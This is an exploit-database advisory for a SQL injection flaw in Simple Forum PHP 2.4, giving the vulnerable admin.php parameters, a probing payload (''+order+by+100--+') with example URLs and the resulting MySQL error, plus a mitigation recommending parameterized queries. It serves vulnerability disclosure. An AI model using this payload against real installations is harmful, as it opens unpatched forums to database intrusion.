Simple Forum PHP 2.4 - SQL Injection

vendor:

Simple Forum PHP

by:

Ashiyane Digital Security Team

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Simple Forum PHP

Affected Version From: 2.4

Affected Version To: 2.4

Patch Exists: NO

Related CWE: N/A

CPE: a:simpleforumphp:simple_forum_php:2.4

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: WebApp - PHP

2016

Simple Forum PHP 2.4 – SQL Injection

A SQL injection vulnerability exists in Simple Forum PHP 2.4. An attacker can send a specially crafted HTTP request to the vulnerable application in order to execute arbitrary SQL commands in the back-end database. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code in the affected parameter. The vulnerable parameter is 'topic_id' and 'id'. An example payload is '+order+by+100--+'. This will result in an error message 'Error: Unknown column '100' in 'order clause'

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries. It is also recommended to use parameterized queries instead of dynamic queries.

Source

Exploit-DB raw data:

=====================================================
# Simple Forum PHP 2.4 - SQL Injection
=====================================================
# Vendor Homepage: http://simpleforumphp.com
# Date: 14 Oct 2016
# Demo Link : http://simpleforumphp.com/forum/admin.php
# Version : 2.4
# Platform : WebApp - PHP
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
=====================================================
# PoC:
Vulnerable Url:
http://localhost/forum/admin.php?act=replies&topic_id=[payload]
http://localhost/forum/admin.php?act=editTopic&id=[payload]
Vulnerable parameter : topic_id , id
Mehod : GET

A simple inject :
Payload : '+order+by+100--+
http://simpleblogphp.com/blog/admin.php?act=editPost&id=1'+order+by+999--+

In response can see result :
Could not execute MySQL query: SELECT * FROM demo_forum_topics WHERE
id='' order by 100-- ' . Error: Unknown column '100' in 'order clause'

Result of payload: Error: Unknown column '100' in 'order clause'
=====================================================
# Discovered By : Ehsan Hosseini
=====================================================